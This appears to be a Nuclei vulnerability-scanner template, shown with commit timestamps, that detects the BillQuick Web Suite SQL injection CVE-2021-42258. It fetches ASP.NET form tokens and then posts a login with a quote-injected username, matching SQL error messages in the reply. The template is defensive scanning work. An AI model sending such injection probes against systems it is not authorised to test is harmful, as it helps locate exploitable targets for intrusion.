nuclei-templates/http/cves/2021/CVE-2021-42258.yaml

73 lines
2.6 KiB
YAML
Raw Normal View History

2021-10-26 08:26:22 +00:00
id: CVE-2021-42258
info:
name: BillQuick Web Suite SQL Injection
2021-10-26 08:26:22 +00:00
author: dwisiswant0
severity: critical
description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite.
2021-10-26 09:02:23 +00:00
reference:
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-42258
cwe-id: CWE-89
epss-score: 0.96873
epss-percentile: 0.9964
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: bqe
product: billquick_web_suite
2023-12-05 09:50:33 +00:00
tags: cve,cve2021,sqli,billquick,kev,bqe
2021-10-26 08:26:22 +00:00
http:
2021-10-26 08:26:22 +00:00
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
2023-01-18 07:00:30 +00:00
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
2021-10-26 08:26:22 +00:00
2023-07-11 19:49:27 +00:00
matchers:
- type: word
part: body
words:
- "System.Data.SqlClient.SqlException"
- "Incorrect syntax near"
- "_ACCOUNTLOCKED"
condition: and
2021-10-26 08:26:22 +00:00
extractors:
- type: xpath
name: VS
internal: true
xpath:
- "/html/body/form/div/input[@id='__VIEWSTATE']"
2023-07-11 19:49:27 +00:00
attribute: value
2021-10-26 08:26:22 +00:00
- type: xpath
name: VSG
internal: true
xpath:
- "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
2023-07-11 19:49:27 +00:00
attribute: value
2021-10-26 08:26:22 +00:00
- type: xpath
name: EV
internal: true
xpath:
- "/html/body/form/div/input[@id='__EVENTVALIDATION']"
2023-07-11 19:49:27 +00:00
attribute: value
# digest: 490a00463044022012eb4b7a797cf33fc51008e1a86462d43051906e792722f4192d6598c50e5f5d02205177faed7ea14ae319190259a165cd9faf3566886d8012239e6f82a30d76776c:922c64590222798bb761d5b6d8e72950